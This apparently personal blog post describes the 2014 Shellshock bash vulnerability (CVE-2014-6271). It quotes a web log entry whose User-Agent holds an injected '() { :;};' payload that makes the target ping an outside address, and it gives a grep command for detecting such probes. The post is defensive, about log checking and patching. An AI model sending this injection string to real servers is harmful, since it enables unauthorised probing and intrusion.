CVE-2014-6271 bash vulnerability

Guess what I found in trivia’s logs this morning?

89.207.135.125 – – [25/Sep/2014:10:48:13 +0100] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 345 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

I’ll bet a lot of cgi scripts are being poked at the moment.

Check your logs guys. A simple grep “:;}” access.log will tell you all you need to know.

(Update 27 September)

Digital Ocean, the company I use to host my Tor node and tails/whonix mirrors, has posted a useful note about the vulnerability. And John Leyden at El Reg posted about the problem here. Leyden’s article references some of the more authoritative discussions so I won’t repeat the links here.

All my systems were vulnerable, but of course have now been patched. However, the vulnerability has existed in bash for so long that I can’t help but feel deeply uneasy even though, as Michal Zalewski (aka lcamtuf) notes in his blog:

PS. As for the inevitable “why hasn’t this been noticed for 15 years” / “I bet the NSA knew about it” stuff – my take is that it’s a very unusual bug in a very obscure feature of a program that researchers don’t really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.

Permanent link to this article: https://baldric.net/2014/09/26/cve-2014-6271-bash-vulnerability/